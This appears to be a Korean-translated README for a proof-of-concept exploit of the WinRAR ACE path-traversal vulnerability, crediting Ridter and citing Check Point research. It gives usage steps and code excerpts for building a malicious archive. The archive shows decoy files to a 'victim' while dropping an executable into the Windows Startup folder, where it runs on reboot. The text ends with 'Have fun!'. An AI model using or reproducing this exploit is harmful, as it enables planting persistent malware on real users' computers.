
https://research.checkpoint.com/extracting-code-execution-from-winrar에 대한 exp
exp for Winrar에서 코드 실행 추출
Ridter의 poc
사용 방법?
Python 3.7을 설치하고, 실행하려는 악성 파일을 준비한 다음, 원하는 값을 설정하기만 하면 됩니다. 이 exp 스크립트는 악성 아카이브 파일을 자동으로 생성합니다!
... ...
# The archive filename you want
rar_filename = "test.rar"
# The evil file you want to run
evil_filename = "calc.exe"
# The decompression path you want, such shown below
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# Other files to be displayed when the victim opens the winrar
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]
... ...
def get_right_hdr_crc(filename):
# This command may be different, it depends on the your Python3 environment.
p = os.popen('py -3 acefile.py --headers %s'%(filename))
res = p.read()
pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
result = pattern.findall(res)
right_hdr_crc = result[0].upper()
return hex2raw4(right_hdr_crc)
... ...
exp를 실행하면 test.rar가 자동으로 생성됩니다.
피해자가 test.rar를 열면 hello.txt와 world.txt 파일이 보입니다. 파일을 더 추가할 수도 있고, 더 매력적인 파일로 만들 수도 있습니다.
![]()
hi.exe라는 파일이 하나 더 생깁니다. 실제로는 calc.exe입니다. 컴퓨터를 다시 시작하면 hi.exe가 실행됩니다.![]()
재미있게 사용하세요! :)